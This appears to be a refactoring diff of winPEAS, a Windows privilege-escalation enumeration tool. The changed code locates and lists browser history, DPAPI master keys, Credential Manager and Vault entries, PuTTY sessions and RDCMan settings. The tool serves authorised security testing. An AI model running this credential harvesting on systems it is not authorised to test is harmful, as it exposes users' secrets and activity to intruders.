Dictionary<string, List<string>> ieHistoryBook = GetIEHistFav();
|
||||
List<string> history = ieHistoryBook["history"];
|
||||
List<string> favorites = ieHistoryBook["favorites"];
|
||||
|
||||
if (history.Count > 0)
|
||||
{
|
||||
@@ -69,8 +69,15 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
Beaprint.AnsiPrint(" " + url, colorsB);
|
||||
}
|
||||
}
|
||||
|
||||
Console.WriteLine();
|
||||
|
||||
int limit = 50;
|
||||
Beaprint.MainPrint($"IE history -- limit {limit}\n");
|
||||
Beaprint.ListPrint(history.Take(limit).ToList());
|
||||
}
|
||||
else
|
||||
{
|
||||
Beaprint.NotFoundPrint();
|
||||
}
|
||||
|
||||
Beaprint.MainPrint("IE favorites");
|
||||
@@ -91,7 +98,7 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
{ "favorites", new List<string>() },
|
||||
};
|
||||
|
||||
DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
|
||||
DateTime startTime = DateTime.Now.AddDays(-lastDays);
|
||||
|
||||
try
|
||||
{
|
||||
@@ -166,24 +173,15 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
if ((settings != null) && (settings.Count != 0))
|
||||
{
|
||||
foreach (KeyValuePair<string, object> kvp in settings)
|
||||
{
|
||||
byte[] timeBytes = RegistryHelper.GetRegValueBytes("HKCU", "SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLsTime", kvp.Key.ToString().Trim());
|
||||
if (timeBytes != null)
|
||||
{
|
||||
long timeLong = (long)(BitConverter.ToInt64(timeBytes, 0));
|
||||
DateTime urlTime = DateTime.FromFileTime(timeLong);
|
||||
if (urlTime > startTime)
|
||||
{
|
||||
results["history"].Add(kvp.Value.ToString().Trim());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
string userIEBookmarkPath = string.Format("{0}\\Favorites\\", System.Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
|
||||
string userIEBookmarkPath = string.Format("{0}\\Favorites\\", Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
if (Directory.Exists(userIEBookmarkPath))
|
||||
{
|
||||
string[] bookmarkPaths = Directory.EnumerateFiles(userIEBookmarkPath, "*.url", SearchOption.AllDirectories).ToArray();
|
||||
|
||||
foreach (string bookmarkPath in bookmarkPaths)
|
||||
{
|
||||
using (StreamReader rdr = new StreamReader(bookmarkPath))
|
||||
@@ -204,6 +202,7 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.GrayPrint(string.Format(" [X] Exception: {0}", ex));
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
@@ -6,7 +7,6 @@ using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
@@ -123,7 +123,7 @@ namespace winPEAS.KnownFileCreds
|
||||
// parses recent file shortcuts via COM
|
||||
List<Dictionary<string, string>> results = new List<Dictionary<string, string>>();
|
||||
int lastDays = 7;
|
||||
DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
|
||||
DateTime startTime = DateTime.Now.AddDays(-lastDays);
|
||||
|
||||
try
|
||||
{
|
||||
@@ -144,6 +144,8 @@ namespace winPEAS.KnownFileCreds
|
||||
{
|
||||
string recentPath = string.Format("{0}\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", dir);
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(recentPath))
|
||||
{
|
||||
string[] recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories).ToArray();
|
||||
|
||||
@@ -152,7 +154,7 @@ namespace winPEAS.KnownFileCreds
|
||||
Console.WriteLine(" {0} :\r\n", userName);
|
||||
foreach (string recentFile in recentFiles)
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(recentFile);
|
||||
|
||||
if (lastAccessed > startTime)
|
||||
{
|
||||
@@ -174,14 +176,16 @@ namespace winPEAS.KnownFileCreds
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", System.Environment.GetEnvironmentVariable("APPDATA"));
|
||||
|
||||
string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", Environment.GetEnvironmentVariable("APPDATA"));
|
||||
if (Directory.Exists(recentPath))
|
||||
{
|
||||
var recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories);
|
||||
|
||||
foreach (string recentFile in recentFiles)
|
||||
@@ -190,7 +194,7 @@ namespace winPEAS.KnownFileCreds
|
||||
//WshShell shell = new WshShell();
|
||||
//IWshShortcut shortcut = (IWshShortcut)shell.CreateShortcut(recentFile);
|
||||
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(recentFile);
|
||||
|
||||
if (lastAccessed > startTime)
|
||||
{
|
||||
@@ -210,6 +214,7 @@ namespace winPEAS.KnownFileCreds
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
// release the WshShell COM object
|
||||
Marshal.ReleaseComObject(shellObj);
|
||||
shellObj = null;
|
||||
@@ -237,13 +242,15 @@ namespace winPEAS.KnownFileCreds
|
||||
string userName = parts[parts.Length - 1];
|
||||
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
|
||||
{
|
||||
List<string> userDPAPIBasePaths = new List<string>();
|
||||
userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
List<string> userDPAPIBasePaths = new List<string>
|
||||
{
|
||||
string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
|
||||
string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
|
||||
};
|
||||
|
||||
foreach (string userDPAPIBasePath in userDPAPIBasePaths)
|
||||
{
|
||||
if (System.IO.Directory.Exists(userDPAPIBasePath))
|
||||
if (Directory.Exists(userDPAPIBasePath))
|
||||
{
|
||||
var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
|
||||
foreach (string directory in directories)
|
||||
@@ -254,9 +261,9 @@ namespace winPEAS.KnownFileCreds
|
||||
{
|
||||
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
string fileName = Path.GetFileName(file);
|
||||
results.Add(new Dictionary<string, string>()
|
||||
{
|
||||
{ "MasterKey", file },
|
||||
@@ -274,13 +281,15 @@ namespace winPEAS.KnownFileCreds
|
||||
else
|
||||
{
|
||||
string userName = Environment.GetEnvironmentVariable("USERNAME");
|
||||
List<string> userDPAPIBasePaths = new List<string>();
|
||||
userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
List<string> userDPAPIBasePaths = new List<string>
|
||||
{
|
||||
string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
|
||||
string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
|
||||
};
|
||||
|
||||
foreach (string userDPAPIBasePath in userDPAPIBasePaths)
|
||||
{
|
||||
if (System.IO.Directory.Exists(userDPAPIBasePath))
|
||||
if (Directory.Exists(userDPAPIBasePath))
|
||||
{
|
||||
var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
|
||||
foreach (string directory in directories)
|
||||
@@ -291,9 +300,9 @@ namespace winPEAS.KnownFileCreds
|
||||
{
|
||||
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
string fileName = Path.GetFileName(file);
|
||||
results.Add(new Dictionary<string, string>()
|
||||
{
|
||||
{ "MasterKey", file },
|
||||
@@ -331,23 +340,25 @@ namespace winPEAS.KnownFileCreds
|
||||
string userName = parts[parts.Length - 1];
|
||||
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
|
||||
{
|
||||
List<string> userCredFilePaths = new List<string>();
|
||||
userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir));
|
||||
userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir));
|
||||
List<string> userCredFilePaths = new List<string>
|
||||
{
|
||||
string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir),
|
||||
string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir)
|
||||
};
|
||||
|
||||
foreach (string userCredFilePath in userCredFilePaths)
|
||||
{
|
||||
if (System.IO.Directory.Exists(userCredFilePath))
|
||||
if (Directory.Exists(userCredFilePath))
|
||||
{
|
||||
var systemFiles = Directory.EnumerateFiles(userCredFilePath);
|
||||
if ((systemFiles != null))
|
||||
{
|
||||
foreach (string file in systemFiles)
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
long size = new System.IO.FileInfo(file).Length;
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
long size = new FileInfo(file).Length;
|
||||
string fileName = Path.GetFileName(file);
|
||||
|
||||
// jankily parse the bytes to extract the credential type and master key GUID
|
||||
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
|
||||
@@ -381,15 +392,17 @@ namespace winPEAS.KnownFileCreds
|
||||
}
|
||||
|
||||
string systemFolder = string.Format("{0}\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials", Environment.GetEnvironmentVariable("SystemRoot"));
|
||||
if (Directory.Exists(systemFolder))
|
||||
{
|
||||
var files = Directory.EnumerateFiles(systemFolder);
|
||||
if ((files != null))
|
||||
{
|
||||
foreach (string file in files)
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
long size = new System.IO.FileInfo(file).Length;
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
string fileName = Path.GetFileName(file);
|
||||
|
||||
// jankily parse the bytes to extract the credential type and master key GUID
|
||||
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
|
||||
@@ -418,12 +431,15 @@ namespace winPEAS.KnownFileCreds
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
string userName = Environment.GetEnvironmentVariable("USERNAME");
|
||||
List<string> userCredFilePaths = new List<string>();
|
||||
userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
List<string> userCredFilePaths = new List<string>
|
||||
{
|
||||
string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE")),
|
||||
string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE"))
|
||||
};
|
||||
|
||||
foreach (string userCredFilePath in userCredFilePaths)
|
||||
{
|
||||
@@ -433,10 +449,10 @@ namespace winPEAS.KnownFileCreds
|
||||
|
||||
foreach (string file in files)
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
long size = new System.IO.FileInfo(file).Length;
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
string fileName = Path.GetFileName(file);
|
||||
|
||||
// jankily parse the bytes to extract the credential type and master key GUID
|
||||
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
@@ -20,7 +20,7 @@ namespace winPEAS.KnownFileCreds
|
||||
try
|
||||
{
|
||||
Beaprint.MainPrint("Putty Sessions");
|
||||
List<Dictionary<string, string>> putty_sess = Putty.GetPuttySessions();
|
||||
List<Dictionary<string, string>> putty_sess = GetPuttySessions();
|
||||
|
||||
Dictionary<string, string> colorF = new Dictionary<string, string>()
|
||||
{
|
||||
@@ -39,7 +39,7 @@ namespace winPEAS.KnownFileCreds
|
||||
try
|
||||
{
|
||||
Beaprint.MainPrint("Putty SSH Host keys");
|
||||
List<Dictionary<string, string>> putty_sess = Putty.ListPuttySSHHostKeys();
|
||||
List<Dictionary<string, string>> putty_sess = ListPuttySSHHostKeys();
|
||||
Dictionary<string, string> colorF = new Dictionary<string, string>()
|
||||
{
|
||||
{ ".*", Beaprint.ansi_color_bad },
|
||||
@@ -182,8 +182,10 @@ namespace winPEAS.KnownFileCreds
|
||||
Dictionary<string, object> hostKeys = RegistryHelper.GetRegValues("HKU", string.Format("{0}\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\", SID));
|
||||
if ((hostKeys != null) && (hostKeys.Count != 0))
|
||||
{
|
||||
Dictionary<string, string> putty_ssh = new Dictionary<string, string>();
|
||||
putty_ssh["UserSID"] = SID;
|
||||
Dictionary<string, string> putty_ssh = new Dictionary<string, string>
|
||||
{
|
||||
["UserSID"] = SID
|
||||
};
|
||||
foreach (KeyValuePair<string, object> kvp in hostKeys)
|
||||
{
|
||||
putty_ssh[kvp.Key] = ""; //Looks like only matters the key name, not the value
|
||||
|
||||
@@ -1,8 +1,8 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Xml;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
@@ -77,7 +77,7 @@ namespace winPEAS.KnownFileCreds
|
||||
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
|
||||
{
|
||||
string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", dir);
|
||||
if (System.IO.File.Exists(userRDManFile))
|
||||
if (File.Exists(userRDManFile))
|
||||
{
|
||||
XmlDocument xmlDoc = new XmlDocument();
|
||||
xmlDoc.Load(userRDManFile);
|
||||
@@ -87,8 +87,8 @@ namespace winPEAS.KnownFileCreds
|
||||
XmlNodeList items = filesToOpen[0].ChildNodes;
|
||||
XmlNode node = items[0];
|
||||
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
|
||||
DateTime lastModified = File.GetLastWriteTime(userRDManFile);
|
||||
Dictionary<string, string> rdg = new Dictionary<string, string>(){
|
||||
{ "RDCManFile", userRDManFile },
|
||||
{ "Accessed", string.Format("{0}", lastAccessed) },
|
||||
@@ -107,9 +107,9 @@ namespace winPEAS.KnownFileCreds
|
||||
else
|
||||
{
|
||||
string userName = Environment.GetEnvironmentVariable("USERNAME");
|
||||
string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", System.Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
|
||||
if (System.IO.File.Exists(userRDManFile))
|
||||
if (File.Exists(userRDManFile))
|
||||
{
|
||||
XmlDocument xmlDoc = new XmlDocument();
|
||||
xmlDoc.Load(userRDManFile);
|
||||
@@ -119,8 +119,8 @@ namespace winPEAS.KnownFileCreds
|
||||
XmlNodeList items = filesToOpen[0].ChildNodes;
|
||||
XmlNode node = items[0];
|
||||
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
|
||||
DateTime lastModified = File.GetLastWriteTime(userRDManFile);
|
||||
Dictionary<string, string> rdg = new Dictionary<string, string>(){
|
||||
{ "RDCManFile", userRDManFile },
|
||||
{ "Accessed", string.Format("{0}", lastAccessed) },
|
||||
|
||||
@@ -24,6 +24,8 @@ namespace winPEAS.KnownFileCreds.SuperPutty
|
||||
try
|
||||
{
|
||||
var path = $"{dir}\\Documents\\SuperPuTTY\\";
|
||||
if (Directory.Exists(path))
|
||||
{
|
||||
var files = Directory.EnumerateFiles(path, filter, SearchOption.TopDirectoryOnly);
|
||||
|
||||
foreach (var file in files)
|
||||
@@ -31,6 +33,7 @@ namespace winPEAS.KnownFileCreds.SuperPutty
|
||||
Beaprint.BadPrint($" {file}");
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
}
|
||||
|
||||
@@ -45,16 +45,18 @@ namespace winPEAS.KnownFileCreds.Vault
|
||||
|
||||
// Create dictionary to translate Guids to human readable elements
|
||||
IntPtr guidAddress = vaultGuidPtr;
|
||||
Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>();
|
||||
vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note");
|
||||
vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential");
|
||||
vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector");
|
||||
vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials");
|
||||
vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials");
|
||||
vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential");
|
||||
vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential");
|
||||
vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential");
|
||||
vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null);
|
||||
Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>
|
||||
{
|
||||
{ new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note" },
|
||||
{ new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential" },
|
||||
{ new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector" },
|
||||
{ new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials" },
|
||||
{ new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials" },
|
||||
{ new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential" },
|
||||
{ new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential" },
|
||||
{ new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential" },
|
||||
{ new Guid("00000000-0000-0000-0000-000000000000"), null }
|
||||
};
|
||||
|
||||
for (int i = 0; i < vaultCount; i++)
|
||||
{
|
||||
@@ -167,7 +169,7 @@ namespace winPEAS.KnownFileCreds.Vault
|
||||
vault_cred["PacakgeSid"] = string.Format("{0}", packageSid);
|
||||
}
|
||||
vault_cred["Credential"] = string.Format("{0}", cred);
|
||||
vault_cred["Last Modified"] = string.Format("{0}", System.DateTime.FromFileTimeUtc((long)lastModified));
|
||||
vault_cred["Last Modified"] = string.Format("{0}", DateTime.FromFileTimeUtc((long)lastModified));
|
||||
results.Add(vault_cred);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1,7 +1,6 @@
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
using winPEAS.Native.Enums;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
|
||||
namespace winPEAS.Native.Classes
|
||||
{
|
||||
|
||||
@@ -1,7 +1,5 @@
|
||||
using System;
|
||||
using System.Runtime.ConstrainedExecution;
|
||||
using System.Runtime.InteropServices;
|
||||
using winPEAS.Info.SystemInfo.NamedPipes;
|
||||
|
||||
namespace winPEAS.Native
|
||||
{
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
using System.Reflection;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
// General Information about an assembly is controlled through the following
|
||||
|
||||
@@ -2,8 +2,6 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Security.AccessControl;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
@@ -20,7 +18,7 @@ namespace winPEAS.TaskScheduler
|
||||
var aces = new System.Collections.Generic.List<GenericAce>(acl.Cast<GenericAce>());
|
||||
|
||||
// Sort aces based on canonical order
|
||||
aces.Sort((a, b) => System.Collections.Generic.Comparer<byte>.Default.Compare(GetComparisonValue(a), GetComparisonValue(b)));
|
||||
aces.Sort((a, b) => Comparer<byte>.Default.Compare(GetComparisonValue(a), GetComparisonValue(b)));
|
||||
|
||||
// Add sorted aces back to ACL
|
||||
while (acl.Count > 0) acl.RemoveAce(0);
|
||||
|
||||
@@ -1,10 +1,10 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Xml.Serialization;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
|
||||
@@ -3,11 +3,8 @@ using System.Collections;
|
||||
using System.Collections.Generic;
|
||||
using System.Collections.Specialized;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml.Serialization;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
@@ -706,7 +703,7 @@ namespace winPEAS.TaskScheduler
|
||||
}
|
||||
}
|
||||
else
|
||||
ret.Add(Action.ExecAction.ConvertFromPowerShellAction(exec));
|
||||
ret.Add(Action.ConvertFromPowerShellAction(exec));
|
||||
}
|
||||
else if (!string.IsNullOrEmpty(exec.Path))
|
||||
{
|
||||
|
||||
@@ -1,9 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,9 +1,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,8 +1,4 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -2,10 +2,7 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Collections.Specialized;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml.Serialization;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
@@ -1,12 +1,8 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics;
|
||||
using System.Linq;
|
||||
using System.Runtime.Serialization;
|
||||
using System.Security;
|
||||
using System.Security.Permissions;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,9 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,10 +1,7 @@
|
||||
using System;
|
||||
using System.Collections;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler.TaskEditor.Native
|
||||
{
|
||||
|
||||
@@ -68,7 +68,7 @@ namespace winPEAS.TaskScheduler.TaskEditor.Native
|
||||
public string CrackName(string name)
|
||||
{
|
||||
var res = CrackNames(new string[] { name });
|
||||
if (res == null || res.Length == 0 || res[0].status != NativeMethods.DS_NAME_ERROR.DS_NAME_NO_ERROR)
|
||||
if (res == null || res.Length == 0 || res[0].status != DS_NAME_ERROR.DS_NAME_NO_ERROR)
|
||||
throw new SecurityException("Unable to resolve user name.");
|
||||
return res[0].pName;
|
||||
}
|
||||
|
||||
@@ -66,12 +66,12 @@ namespace winPEAS.TaskScheduler.TaskEditor.Native
|
||||
public struct NetworkComputerInfo // SERVER_INFO_101
|
||||
{
|
||||
ServerPlatform sv101_platform_id;
|
||||
[MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
|
||||
[MarshalAs(UnmanagedType.LPWStr)]
|
||||
string sv101_name;
|
||||
int sv101_version_major;
|
||||
int sv101_version_minor;
|
||||
ServerTypes sv101_type;
|
||||
[MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
|
||||
[MarshalAs(UnmanagedType.LPWStr)]
|
||||
string sv101_comment;
|
||||
|
||||
public ServerPlatform Platform => sv101_platform_id;
|
||||
|
||||
@@ -1,9 +1,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics.Eventing.Reader;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,13 +1,10 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security;
|
||||
using System.Security.AccessControl;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Threading.Tasks;
|
||||
